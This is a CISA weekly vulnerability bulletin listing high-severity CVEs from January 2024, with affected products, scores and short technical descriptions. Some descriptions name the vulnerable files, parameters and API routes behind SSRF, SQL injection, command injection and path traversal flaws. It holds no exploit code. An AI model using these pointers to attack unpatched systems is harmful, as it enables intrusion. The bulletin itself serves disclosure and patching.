US-CERT Vulnerability Summary for the Week of January 22, 2024
Bulletins provide weekly summaries of new vulnerabilities. Patch information is provided when available.
The CISA Vulnerability Bulletin provides a summary of new vulnerabilities that have been recorded by the National Institute of Standards and Technology (NIST) National Vulnerability Database (NVD) in the past week. NVD is sponsored by CISA. In some cases, the vulnerabilities in the bulletin may not yet have assigned CVSS scores. Please visit NVD for updated vulnerability entries, which include CVSS scores once they are available.
Vulnerabilities are based on the Common Vulnerabilities and Exposures (CVE) vulnerability naming standard and are organized according to severity, determined by the Common Vulnerability Scoring System (CVSS) standard. The division of high, medium, and low severities correspond to the following scores:
- High: vulnerabilities with a CVSS base score of 7.0–10.0
- Medium: vulnerabilities with a CVSS base score of 4.0–6.9
- Low: vulnerabilities with a CVSS base score of 0.0–3.9
Entries may include additional information provided by organizations and efforts sponsored by CISA. This information may include identifying information, values, definitions, and related links. Patch information is provided when available. Please note that some of the information in the bulletin is compiled from external, open-source reports and is not a direct result of CISA analysis.
High Vulnerabilities
Primary Vendor — Product | Description | Published | CVSS Score | Source & Patch Info |
---|---|---|---|---|
60indexpage — 60indexpage | A vulnerability classified as critical has been found in 60IndexPage up to 1.8.5. This affects an unknown part of the file /include/file.php of the component Parameter Handler. The manipulation of the argument url leads to server-side request forgery. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252189 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-26 | 7.3 | CVE-2024-0945 [email protected] [email protected] [email protected] |
60indexpage — 60indexpage | A vulnerability classified as critical was found in 60IndexPage up to 1.8.5. This vulnerability affects unknown code of the file /apply/index.php of the component Parameter Handler. The manipulation of the argument url leads to server-side request forgery. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-252190 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-26 | 7.3 | CVE-2024-0946 [email protected] [email protected] [email protected] |
actidata — actinas_sl_2u-8_rdx_firmware | Improper access control on nasSvr.php in actidata actiNAS SL 2U-8 RDX 3.2.03-SP1 allows remote attackers to read and modify different types of data without authentication. | 2024-01-19 | 9.1 | CVE-2023-51947 [email protected] [email protected] [email protected] |
actidata — actinas_sl_2u-8_rdx_firmware | A Site-wide directory listing vulnerability in /fm in actidata actiNAS SL 2U-8 RDX 3.2.03-SP1 allows remote attackers to list the files hosted by the web application. | 2024-01-19 | 7.5 | CVE-2023-51948 [email protected] [email protected] |
anomali — match | Anomali Match before 4.6.2 allows OS Command Injection. An authenticated admin user can inject and execute operating system commands. This arises from improper handling of untrusted input, enabling an attacker to elevate privileges, execute system commands, and potentially compromise the underlying operating system. The fixed versions are 4.4.5, 4.5.4, and 4.6.2. The earliest affected version is 4.3. | 2024-01-19 | 7.2 | CVE-2023-49329 [email protected] [email protected] |
apache_software_foundation — apache_superset | A stored cross-site scripting (XSS) vulnerability exists in Apache Superset before 3.0.3. An authenticated attacker with create/update permissions on charts or dashboards could store a script or add a specific HTML snippet that would act as a stored XSS. For 2.X versions, users should change their config to include: TALISMAN_CONFIG = { “content_security_policy”: { “base-uri”: [“‘self'”], “default-src”: [“‘self'”], “img-src”: [“‘self'”, “blob:”, “data:”], “worker-src”: [“‘self'”, “blob:”], “connect-src”: [ “‘self'”, ” https://api.mapbox.com” https://api.mapbox.com” ;, ” https://events.mapbox.com” https://events.mapbox.com” ;, ], “object-src”: “‘none'”, “style-src”: [ “‘self'”, “‘unsafe-inline'”, ], “script-src”: [“‘self'”, “‘strict-dynamic'”], }, “content_security_policy_nonce_in”: [“script-src”], “force_https”: False, “session_cookie_secure”: False, } | 2024-01-23 | 9.6 | CVE-2023-49657 [email protected] |
apple — ipados | The issue was addressed with additional permissions checks. This issue is fixed in macOS Sonoma 14.3, iOS 17.3 and iPadOS 17.3. A shortcut may be able to use sensitive data with certain actions without prompting the user. | 2024-01-23 | 7.5 | CVE-2024-23203 [email protected] [email protected] [email protected] [email protected] |
apple — ipados | The issue was addressed with additional permissions checks. This issue is fixed in macOS Sonoma 14.3, watchOS 10.3, iOS 17.3 and iPadOS 17.3. A shortcut may be able to use sensitive data with certain actions without prompting the user. | 2024-01-23 | 7.5 | CVE-2024-23204 [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] |
apple — macos | The issue was addressed with improved memory handling. This issue is fixed in macOS Sonoma 14.3. Processing web content may lead to arbitrary code execution. | 2024-01-23 | 8.8 | CVE-2024-23209 [email protected] [email protected] |
apple — macos | The issue was addressed with improved memory handling. This issue is fixed in macOS Sonoma 14.2. Processing a file may lead to unexpected app termination or arbitrary code execution. | 2024-01-23 | 7.8 | CVE-2023-42881 [email protected] |
argo– cd_api | Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. The Argo CD API prior to versions 2.10-rc2, 2.9.4, 2.8.8, and 2.7.15 are vulnerable to a cross-server request forgery (CSRF) attack when the attacker has the ability to write HTML to a page on the same parent domain as Argo CD. A CSRF attack works by tricking an authenticated Argo CD user into loading a web page which contains code to call Argo CD API endpoints on the victim’s behalf. For example, an attacker could send an Argo CD user a link to a page which looks harmless but in the background calls an Argo CD API endpoint to create an application running malicious code. Argo CD uses the “Lax” SameSite cookie policy to prevent CSRF attacks where the attacker controls an external domain. The malicious external website can attempt to call the Argo CD API, but the web browser will refuse to send the Argo CD auth token with the request. Many companies host Argo CD on an internal subdomain. If an attacker can place malicious code on, for example, https://test.internal.example.com/, they can still perform a CSRF attack. In this case, the “Lax” SameSite cookie does not prevent the browser from sending the auth cookie, because the destination is a parent domain of the Argo CD API. Browsers generally block such attacks by applying CORS policies to sensitive requests with sensitive content types. Specifically, browsers will send a “preflight request” for POSTs with content type “application/json” asking the destination API “are you allowed to accept requests from my domain?” If the destination API does not answer “yes,” the browser will block the request. Before the patched versions, Argo CD did not validate that requests contained the correct content type header. So an attacker could bypass the browser’s CORS check by setting the content type to something which is considered “not sensitive” such as “text/plain.” The browser wouldn’t send the preflight request, and Argo CD would happily accept the contents (which are actually still JSON) and perform the requested action (such as running malicious code). A patch for this vulnerability has been released in the following Argo CD versions: 2.10-rc2, 2.9.4, 2.8.8, and 2.7.15. The patch contains a breaking API change. The Argo CD API will no longer accept non-GET requests which do not specify application/json as their Content-Type. The accepted content types list is configurable, and it is possible (but discouraged) to disable the content type check completely. Users are advised to upgrade. There are no known workarounds for this vulnerability. | 2024-01-19 | 8.3 | CVE-2024-22424 [email protected] [email protected] [email protected] |
arris — surfboard_sbg6950ac2 | An arbitrary code execution vulnerability exists in Arris SURFboard SGB6950AC2 devices. An unauthenticated attacker can exploit this vulnerability to achieve code execution as root. | 2024-01-26 | 9.6 | CVE-2024-23618 [email protected] |
asus– armoury_crate | ASUS Armoury Crate has a vulnerability in arbitrary file write and allows remote attackers to access or modify arbitrary files by sending specific HTTP requests without permission. | 2024-01-19 | 9.8 | CVE-2023-5716 [email protected] |
benbusby — whoogle-search | Whoogle Search is a self-hosted metasearch engine. In versions prior to 0.8.4, the `element` method in `app/routes.py` does not validate the user-controlled `src_type` and `element_url` variables and passes them to the `send` method which sends a GET request on lines 339-343 in `request.py`, which leads to a server-side request forgery. This issue allows for crafting GET requests to internal and external resources on behalf of the server. For example, this issue would allow for accessing resources on the internal network that the server has access to, even though these resources may not be accessible on the internet. This issue is fixed in version 0.8.4. | 2024-01-23 | 9.1 | CVE-2024-22203 [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] |
benbusby — whoogle-search | Whoogle Search is a self-hosted metasearch engine. In versions 0.8.3 and prior, the `window` endpoint does not sanitize user-supplied input from the `location` variable and passes it to the `send` method which sends a `GET` request on lines 339-343 in `request.py,` which leads to a server-side request forgery. This issue allows for crafting GET requests to internal and external resources on behalf of the server. For example, this issue would allow for accessing resources on the internal network that the server has access to, even though these resources may not be accessible on the internet. This issue is fixed in version 0.8.4. | 2024-01-23 | 9.1 | CVE-2024-22205 [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] |
biges_safe_life_technologies_electronics_inc. — vguard | Path Traversal: ‘/../filedir’ vulnerability in Biges Safe Life Technologies Electronics Inc. VGuard allows Absolute Path Traversal.This issue affects VGuard: before V500.0003.R008.4011.C0012.B351.C. | 2024-01-26 | 7.5 | CVE-2023-6919 [email protected] |
byzoro — smart_s150_firmware | A vulnerability was found in Beijing Baichuo Smart S150 Management Platform V31R02B15. It has been classified as critical. Affected is an unknown function of the file /useratte/inc/userattea.php. The manipulation leads to improper access controls. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-251538 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-19 | 9.8 | CVE-2024-0712 [email protected] [email protected] [email protected] |
cisco — cisco_unified_contact_center_enterprise | A vulnerability in multiple Cisco Unified Communications and Contact Center Solutions products could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device. This vulnerability is due to the improper processing of user-provided data that is being read into memory. An attacker could exploit this vulnerability by sending a crafted message to a listening port of an affected device. A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with the privileges of the web services user. With access to the underlying operating system, the attacker could also establish root access on the affected device. | 2024-01-26 | 9.9 | CVE-2024-20253 [email protected] |
clickhouse — java_libraries | Exposure of sensitive information in exceptions in ClichHouse’s clickhouse-r2dbc, com.clickhouse:clickhouse-jdbc, and com.clickhouse:clickhouse-client versions less than 0.4.6 allows unauthorized users to gain access to client certificate passwords via client exception logs. This occurs when ‘sslkey’ is specified and an exception, such as a ClickHouseException or SQLException, is thrown during database operations; the certificate password is then included in the logged exception message. | 2024-01-19 | 8.8 | CVE-2024-23689 [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] |
crestron — am-300 | There is an OS command injection vulnerability in Crestron AM-300 firmware version 1.4499.00018 which may enable a user of a limited-access SSH session to escalate their privileges to root-level access. | 2024-01-23 | 8.4 | CVE-2023-6926 [email protected] |
d-link — dap-1650 | A command injection vulnerability exists in the gena.cgi module of D-Link DAP-1650 devices. An unauthenticated attacker can exploit this vulnerability to gain command execution on the device as root. | 2024-01-26 | 9.6 | CVE-2024-23624 [email protected] |
d-link — dap-1650 | A command injection vulnerability exists in D-Link DAP-1650 devices when handling UPnP SUBSCRIBE messages. An unauthenticated attacker can exploit this vulnerability to gain command execution on the device as root. | 2024-01-26 | 9.6 | CVE-2024-23625 [email protected] |
dedecms — dedecms | DedeCMS 5.7.112 has a File Upload vulnerability via uploads/dede/module_upload.php. | 2024-01-22 | 8.8 | CVE-2024-22895 [email protected] |
delhivery — delhivery_logistics_courier | Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Delhivery Delhivery Logistics Courier. This issue affects Delhivery Logistics Courier: from n/a through 1.0.107. | 2024-01-27 | 8.5 | CVE-2024-22283 [email protected] |
dell — networker_module_for_databases_and_applications_oracle | Networker 19.9 and all prior versions contains a Plain-text Password stored in temporary config file during backup duration in NMDA MySQL Database backups. User has low privilege access to Networker Client system could potentially exploit this vulnerability, leading to the disclosure of configured MySQL Database user credentials. The attacker may be able to use the exposed credentials to access the vulnerable application Database with privileges of the compromised account. | 2024-01-25 | 7.8 | CVE-2024-22432 [email protected] |
dexidp — dex | Dex is an identity service that uses OpenID Connect to drive authentication for other apps. Dex 2.37.0 serves HTTPS with insecure TLS 1.0 and TLS 1.1. `cmd/dex/serve.go` line 425 seemingly sets TLS 1.2 as minimum version, but the whole `tlsConfig` is ignored after `TLS cert reloader` was introduced in v2.37.0. Configured cipher suites are not respected either. This issue is fixed in Dex 2.38.0. | 2024-01-25 | 7.5 | CVE-2024-23656 [email protected] [email protected] [email protected] [email protected] [email protected] |
dolibarr — dolibarr | Dolibarr is an enterprise resource planning (ERP) and customer relationship management (CRM) software package. Version 18.0.4 has a HTML Injection vulnerability in the Home page of the Dolibarr Application. This vulnerability allows an attacker to inject arbitrary HTML tags and manipulate the rendered content in the application’s response. Specifically, I was able to successfully inject a new HTML tag into the returned document and, as a result, was able to comment out some part of the Dolibarr App Home page HTML code. This behavior can be exploited to perform various attacks like Cross-Site Scripting (XSS). To remediate the issue, validate and sanitize all user-supplied input, especially within HTML attributes, to prevent HTML injection attacks; and implement proper output encoding when rendering user-provided data to ensure it is treated as plain text rather than executable HTML. | 2024-01-25 | 7.1 | CVE-2024-23817 [email protected] |
dom96 — httpbeast | An issue in dom96 HTTPbeast v.0.4.1 and before allows a remote attacker to execute arbitrary code via a crafted request to the parser.nim component. | 2024-01-19 | 9.8 | CVE-2023-50694 [email protected] [email protected] [email protected] |
dremio — dremio | Dremio before 24.3.1 allows path traversal. An authenticated user who has no privileges on certain folders (and the files and datasets in these folders) can access these folders, files, and datasets. To be successful, the user must have access to the source and at least one folder in the source. Affected versions are: 24.0.0 through 24.3.0, 23.0.0 through 23.2.3, and 22.0.0 through 22.2.2. Fixed versions are: 24.3.1 and later, 23.2.4 and later, and 22.2.3 and later. | 2024-01-22 | 8.8 | CVE-2024-23768 [email protected] |
ejinshan — terminal_security_system | File upload vulnerability in ejinshan v8+ terminal security system allows attackers to upload arbitrary files to arbitrary locations on the server. | 2024-01-20 | 9.8 | CVE-2021-31314 [email protected] |
embedchain — embedchain | The OpenAPI loader in Embedchain before 0.1.57 allows attackers to execute arbitrary code, related to the openapi.py yaml.load function argument. | 2024-01-21 | 9.8 | CVE-2024-23731 [email protected] [email protected] |
embedchain — embedchain | The JSON loader in Embedchain before 0.1.57 allows a ReDoS (regular expression denial of service) via a long string to json.py. | 2024-01-21 | 7.5 | CVE-2024-23732 [email protected] [email protected] |
enonic — xp | Enonic XP versions less than 7.7.4 are vulnerable to a session fixation issue. An remote and unauthenticated attacker can use prior sessions due to the lack of invalidating session attributes. | 2024-01-19 | 9.8 | CVE-2024-23679 [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] |
fortra — goanywhere_mft | Authentication bypass in Fortra’s GoAnywhere MFT prior to 7.4.1 allows an unauthorized user to create an admin user via the administration portal. | 2024-01-22 | 9.8 | CVE-2024-0204 df4dee71-de3a-4139-9588-11b62fe6c0ff df4dee71-de3a-4139-9588-11b62fe6c0ff df4dee71-de3a-4139-9588-11b62fe6c0ff |
foru_cms_project — foru_cms | A vulnerability classified as problematic was found in ForU CMS up to 2020-06-23. Affected by this vulnerability is an unknown functionality of the file channel.php. The manipulation of the argument c_cmodel leads to file inclusion. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251551. | 2024-01-19 | 9.8 | CVE-2024-0728 [email protected] [email protected] [email protected] |
foru_cms_project — foru_cms | A vulnerability, which was classified as critical, has been found in ForU CMS up to 2020-06-23. Affected by this issue is some unknown functionality of the file cms_admin.php. The manipulation of the argument a_name leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251552. | 2024-01-19 | 9.8 | CVE-2024-0729 [email protected] [email protected] [email protected] |
freerdp — freerdp | FreeRDP is a set of free and open source remote desktop protocol library and clients. In affected versions an integer overflow in `freerdp_bitmap_planar_context_reset` leads to heap-buffer overflow. This affects FreeRDP based clients. FreeRDP based server implementations and proxy are not affected. A malicious server could prepare a `RDPGFX_RESET_GRAPHICS_PDU` to allocate too small buffers, possibly triggering later out of bound read/write. Data extraction over network is not possible, the buffers are used to display an image. This issue has been addressed in version 2.11.5 and 3.2.0. Users are advised to upgrade. there are no know workarounds for this vulnerability. | 2024-01-19 | 9.8 | CVE-2024-22211 [email protected] [email protected] [email protected] |
freesshd — freesshd | A vulnerability was found in freeSSHd 1.0.9 on Windows. It has been classified as problematic. This affects an unknown part. The manipulation leads to denial of service. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251547. | 2024-01-19 | 7.5 | CVE-2024-0723 [email protected] [email protected] [email protected] |
garethhk — mldong | A vulnerability, which was classified as critical, has been found in ???? mldong 1.0. This issue affects the function ExpressionEngine of the file com/mldong/modules/wf/engine/model/DecisionModel.java. The manipulation leads to code injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251561 was assigned to this vulnerability. | 2024-01-19 | 9.8 | CVE-2024-0738 [email protected] [email protected] [email protected] |
gitlab — gitlab | An issue has been discovered in GitLab CE/EE affecting all versions from 16.0 prior to 16.6.6, 16.7 prior to 16.7.4, and 16.8 prior to 16.8.1 which allows an authenticated user to write files to arbitrary locations on the GitLab server while creating a workspace. | 2024-01-26 | 9.9 | CVE-2024-0402 [email protected] [email protected] |
hewlett_packard_enterprise — hpe_oneview | HPE OneView may allow command injection with local privilege escalation. | 2024-01-23 | 7.8 | CVE-2023-50274 [email protected] |
hewlett_packard_enterprise — hpe_oneview | HPE OneView may allow clusterService Authentication Bypass resulting in denial of service. | 2024-01-23 | 7.5 | CVE-2023-50275 [email protected] |
hitron_systems — dvr_hvr-16781 | Improper Input Validation in Hitron Systems DVR HVR-16781 1.03~4.02 allows an attacker to cause network attack in case of using default admin ID/PW. | 2024-01-23 | 7.4 | CVE-2024-22770 [email protected] |
hitron_systems — dvr_hvr-4781 | Improper Input Validation in Hitron Systems DVR HVR-4781 1.03~4.02 allows an attacker to cause network attack in case of using default admin ID/PW. | 2024-01-23 | 7.4 | CVE-2024-22768 [email protected] |
hitron_systems — dvr_hvr-8781 | Improper Input Validation in Hitron Systems DVR HVR-8781 1.03~4.02 allows an attacker to cause network attack in case of using default admin ID/PW. | 2024-01-23 | 7.4 | CVE-2024-22769 [email protected] |
hitron_systems — dvr_lguvr-4h | Improper Input Validation in Hitron Systems DVR LGUVR-4H 1.02~4.02 allows an attacker to cause network attack in case of using default admin ID/PW. | 2024-01-23 | 7.4 | CVE-2024-22771 [email protected] |
hitron_systems — dvr_lguvr-8h | Improper Input Validation in Hitron Systems DVR LGUVR-8H 1.02~4.02 allows an attacker to cause network attack in case of using default admin ID/PW. | 2024-01-23 | 7.4 | CVE-2024-22772 [email protected] |
hitron_systems_dvr — dvr_lguvr-16h | Improper Input Validation in Hitron Systems DVR LGUVR-16H 1.02~4.02 allows an attacker to cause network attack in case of using default admin ID/PW. | 2024-01-23 | 7.4 | CVE-2024-23842 [email protected] |
humansignal — label-studio | Label Studio is an a popular open source data labeling tool. Versions prior to 1.9.2 have a cross-site scripting (XSS) vulnerability that could be exploited when an authenticated user uploads a crafted image file for their avatar that gets rendered as a HTML file on the website. Executing arbitrary JavaScript could result in an attacker performing malicious actions on Label Studio users if they visit the crafted avatar image. For an example, an attacker can craft a JavaScript payload that adds a new Django Super Administrator user if a Django administrator visits the image. The file `users/functions.py` lines 18-49 show that the only verification check is that the file is an image by extracting the dimensions from the file. Label Studio serves avatar images using Django’s built-in `serve` view, which is not secure for production use according to Django’s documentation. The issue with the Django `serve` view is that it determines the `Content-Type` of the response by the file extension in the URL path. Therefore, an attacker can upload an image that contains malicious HTML code and name the file with a `.html` extension to be rendered as a HTML page. The only file extension validation is performed on the client-side, which can be easily bypassed. Version 1.9.2 fixes this issue. Other remediation strategies include validating the file extension on the server side, not in client-side code; removing the use of Django’s `serve` view and implement a secure controller for viewing uploaded avatar images; saving file content in the database rather than on the filesystem to mitigate against other file related vulnerabilities; and avoiding trusting user controlled inputs. | 2024-01-23 | 7.1 | CVE-2023-47115 [email protected] [email protected] [email protected] [email protected] [email protected] |
ibm — db2 | IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 11.5 federated server is vulnerable to a denial of service when a specially crafted cursor is used. IBM X-Force ID: 268759. | 2024-01-22 | 7.5 | CVE-2023-45193 [email protected] [email protected] |
ibm — db2 | IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 11.5 is vulnerable to an insecure cryptographic algorithm and to information disclosure in stack trace under exceptional conditions. IBM X-Force ID: 270730. | 2024-01-22 | 7.5 | CVE-2023-47152 [email protected] [email protected] |
ibm — maximo_application_suite | IBM Maximo Asset Management 7.6.1.3 and Manage Component 8.10 through 8.11 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 271843. | 2024-01-19 | 8.8 | CVE-2023-47718 [email protected] [email protected] [email protected] |
ibm — openpages_with_watson | IBM OpenPages with Watson 8.3 and 9.0 could provide weaker than expected security in a OpenPages environment using Native authentication. If OpenPages is using Native authentication an attacker with access to the OpenPages database could through a series of specially crafted steps could exploit this weakness and gain unauthorized access to other OpenPages accounts. IBM X-Force ID: 262594. | 2024-01-19 | 8.1 | CVE-2023-38738 [email protected] [email protected] |
ibm — openpages_with_watson | IBM OpenPages with Watson 8.3 and 9.0 could allow remote attacker to bypass security restrictions, caused by insufficient authorization checks. By authenticating as an OpenPages user and using non-public APIs, an attacker could exploit this vulnerability to bypass security and gain unauthorized administrative access to the application. IBM X-Force ID: 264005. | 2024-01-19 | 8.8 | CVE-2023-40683 [email protected] [email protected] |
ibm_merge_healthcare — _efilm_workstation | An improper privilege management vulnerability exists in IBM Merge Healthcare eFilm Workstation. A local, authenticated attacker can exploit this vulnerability to escalate privileges to SYSTEM. | 2024-01-26 | 8.8 | CVE-2024-23620 [email protected] |
ibm_merge_healthcare — efilm_workstation | A buffer overflow exists in IBM Merge Healthcare eFilm Workstation license server. A remote, unauthenticated attacker can exploit this vulnerability to achieve remote code execution. | 2024-01-26 | 10 | CVE-2024-23621 [email protected] |
ibm_merge_healthcare — efilm_workstation | A stack-based buffer overflow exists in IBM Merge Healthcare eFilm Workstation license server. A remote, unauthenticated attacker can exploit this vulnerability to achieve remote code execution with SYSTEM privileges. | 2024-01-26 | 10 | CVE-2024-23622 [email protected] |
ibm_merge_healthcare — efilm_workstation | A hardcoded credential vulnerability exists in IBM Merge Healthcare eFilm Workstation. A remote, unauthenticated attacker can exploit this vulnerability to achieve information disclosure or remote code execution. | 2024-01-26 | 9.8 | CVE-2024-23619 [email protected] |
instawp_team — instawp_connec-1_click_wp_staging_&_migration | Exposure of Sensitive Information to an Unauthorized Actor vulnerability in InstaWP Team InstaWP Connect – 1-click WP Staging & Migration. This issue affects InstaWP Connect – 1-click WP Staging & Migration: from n/a through 0.1.0.9. | 2024-01-27 | 7.7 | CVE-2024-23506 [email protected] |
intel — nuc_bios | Improper input validation for some Intel NUC BIOS firmware before version JY0070 may allow a privileged user to potentially enable escalation of privilege via local access. | 2024-01-19 | 7.5 | CVE-2023-28738 [email protected] |
intel — nuc_bios | Improper input validation for some Intel NUC BIOS firmware before version QN0073 may allow a privileged user to potentially enable escalation of privilege via local access. | 2024-01-19 | 7.5 | CVE-2023-28743 [email protected] |
intel — nuc_bios | Improper input validation for some Intel NUC BIOS firmware before version IN0048 may allow a privileged user to potentially enable escalation of privilege via local access. | 2024-01-19 | 7.5 | CVE-2023-29495 [email protected] |
intel — nuc_pro | Uncontrolled search path in some Intel NUC Pro Software Suite Configuration Tool software installers before version 3.0.0.6 may allow an authenticated user to potentially enable denial of service via local access. | 2024-01-19 | 7.9 | CVE-2023-32272 [email protected] |
intel– hotkey | Improper access control in some Intel HotKey Services for Windows 10 for Intel NUC P14E Laptop Element software installers before version 1.1.45 may allow an authenticated user to potentially enable denial of service via local access. | 2024-01-19 | 7.3 | CVE-2023-32544 [email protected] |
intel– nuc_8_compute_element_bios | Improper input validation in some Intel NUC 8 Compute Element BIOS firmware may allow a privileged user to potentially enable escalation of privilege via local access. | 2024-01-19 | 7.5 | CVE-2023-42766 [email protected] |
intel– nuc_bios | Improper input validation in some Intel NUC BIOS firmware may allow a privileged user to potentially enable escalation of privilege via local access. | 2024-01-19 | 7.5 | CVE-2023-38587 [email protected] |
intel– nuc_bios | Improper buffer restrictions in some Intel NUC BIOS firmware may allow a privileged user to potentially enable escalation of privilege via local access. | 2024-01-19 | 7.5 | CVE-2023-42429 [email protected] |
jester_project — jester | An issue in dom96 Jester v.0.6.0 and before allows a remote attacker to execute arbitrary code via a crafted request. | 2024-01-19 | 9.8 | CVE-2023-50693 [email protected] [email protected] [email protected] |
joommasters — jmssetting | In the module “Jms Setting” (jmssetting) from Joommasters for PrestaShop, a guest can perform SQL injection in versions <= 1.1.0. The method `JmsSetting::getSecondImgs()` has a sensitive SQL call that can be executed with a trivial http call and exploited to forge a blind SQL injection. | 2024-01-19 | 9.8 | CVE-2023-50030 [email protected] [email protected] |
jsrsasign — jsrsasign | Versions of the package jsrsasign before 11.0.0 are vulnerable to Observable Discrepancy via the RSA PKCS1.5 or RSAOAEP decryption process. An attacker can decrypt ciphertexts by exploiting this vulnerability. Exploiting this vulnerability requires the attacker to have access to a large number of ciphertexts encrypted with the same key. Workaround This vulnerability can be mitigated by finding and replacing RSA and RSAOAEP decryption with another crypto library. | 2024-01-22 | 7.5 | CVE-2024-21484 [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] |
juniper_networks — junos_os | An Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in J-Web of Juniper Networks Junos OS on SRX Series and EX Series allows an attacker to construct a URL that when visited by another user enables the attacker to execute commands with the target’s permissions, including an administrator. A specific invocation of the emit_debug_note method in webauth_operation.php will echo back the data it receives. This issue affects Juniper Networks Junos OS on SRX Series and EX Series: * All versions earlier than 20.4R3-S10; * 21.2 versions earlier than 21.2R3-S8; * 21.4 versions earlier than 21.4R3-S6; * 22.1 versions earlier than 22.1R3-S5; * 22.2 versions earlier than 22.2R3-S3; * 22.3 versions earlier than 22.3R3-S2; * 22.4 versions earlier than 22.4R3-S1; * 23.2 versions earlier than 23.2R2; * 23.4 versions earlier than 23.4R2. | 2024-01-25 | 8.8 | CVE-2024-21620 [email protected] |
keycloak — keycloak | A flaw was found in the redirect_uri validation logic in Keycloak. This issue may allow a bypass of otherwise explicitly allowed hosts. A successful attack may lead to an access token being stolen, making it possible for the attacker to impersonate other users. | 2024-01-26 | 7.1 | CVE-2023-6291 [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] |
leadshop — leadshop | A vulnerability, which was classified as critical, was found in Hecheng Leadshop up to 1.4.20. Affected is an unknown function of the file /web/leadshop.php. The manipulation of the argument install leads to deserialization. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-251562 is the identifier assigned to this vulnerability. | 2024-01-19 | 9.8 | CVE-2024-0739 [email protected] [email protected] [email protected] |
lemmynet — lemmy | Lemmy is a link aggregator and forum for the fediverse. Starting in version 0.17.0 and prior to version 0.19.1, users can report private messages, even when they’re neither sender nor recipient of the message. The API response to creating a private message report contains the private message itself, which means any user can just iterate over message ids to (loudly) obtain all private messages of an instance. A user with instance admin privileges can also abuse this if the private message is removed from the response, as they’re able to see the resulting reports. Creating a private message report by POSTing to `/api/v3/private_message/report` does not validate whether the reporter is the recipient of the message. lemmy-ui does not allow the sender to report the message; the API method should likely be restricted to accessible to recipients only. The API response when creating a report contains the `private_message_report_view` with all the details of the report, including the private message that has been reported: Any authenticated user can obtain arbitrary (untargeted) private message contents. Privileges required depend on the instance configuration; when registrations are enabled without application system, the privileges required are practically none. When registration applications are required, privileges required could be considered low, but this assessment heavily varies by instance. Version 0.19.1 contains a patch for this issue. A workaround is available. If an update to a fixed Lemmy version is not immediately possible, the API route can be blocked in the reverse proxy. This will prevent anyone from reporting private messages, but it will also prevent exploitation before the update has been applied. | 2024-01-24 | 7.5 | CVE-2024-23649 [email protected] [email protected] |
lenovo — tab_m8_hd_tb8505f_firmware | A privilege escalation vulnerability was reported in some Lenovo tablet products that could allow local applications access to device identifiers and system commands. | 2024-01-19 | 7.8 | CVE-2023-5080 [email protected] |
lenovo — vantage | A privilege escalation vulnerability was reported in Lenovo Vantage that could allow a local attacker to bypass integrity checks and execute arbitrary code with elevated privileges. | 2024-01-19 | 7.8 | CVE-2023-6043 [email protected] |
linux — kernel | A use-after-free flaw was found in the Linux Kernel due to a race problem in the unix garbage collector’s deletion of SKB races with unix_stream_read_generic() on the socket that the SKB is queued on. | 2024-01-21 | 7 | CVE-2023-6531 [email protected] [email protected] [email protected] |
ls1intum — artemis_java_test_sandbox | Artemis Java Test Sandbox versions before 1.11.2 are vulnerable to a sandbox escape when an attacker loads untrusted libraries using System.load or System.loadLibrary. An attacker can abuse this issue to execute arbitrary Java when a victim executes the supposedly sandboxed code. | 2024-01-19 | 8.2 | CVE-2024-23681 [email protected] [email protected] [email protected] |
ls1intum — artemis_java_test_sandbox | Artemis Java Test Sandbox versions before 1.8.0 are vulnerable to a sandbox escape when an attacker includes class files in a package that Ares trusts. An attacker can abuse this issue to execute arbitrary Java when a victim executes the supposedly sandboxed code. | 2024-01-19 | 8.2 | CVE-2024-23682 [email protected] [email protected] [email protected] [email protected] [email protected] |
ls1intum — artemis_java_test_sandbox | Artemis Java Test Sandbox versions less than 1.7.6 are vulnerable to a sandbox escape when an attacker crafts a special subclass of InvocationTargetException. An attacker can abuse this issue to execute arbitrary Java when a victim executes the supposedly sandboxed code. | 2024-01-19 | 8.2 | CVE-2024-23683 [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] |
mate-desktop — atril | Atril Document Viewer is the default document reader of the MATE desktop environment for Linux. A path traversal and arbitrary file write vulnerability exists in versions of Atril prior to 1.26.2. This vulnerability is capable of writing arbitrary files anywhere on the filesystem to which the user opening a crafted document has access. The only limitation is that this vulnerability cannot be exploited to overwrite existing files, but that doesn’t stop an attacker from achieving Remote Command Execution on the target system. Version 1.26.2 of Atril contains a patch for this vulnerability. | 2024-01-25 | 8.5 | CVE-2023-52076 [email protected] [email protected] [email protected] |
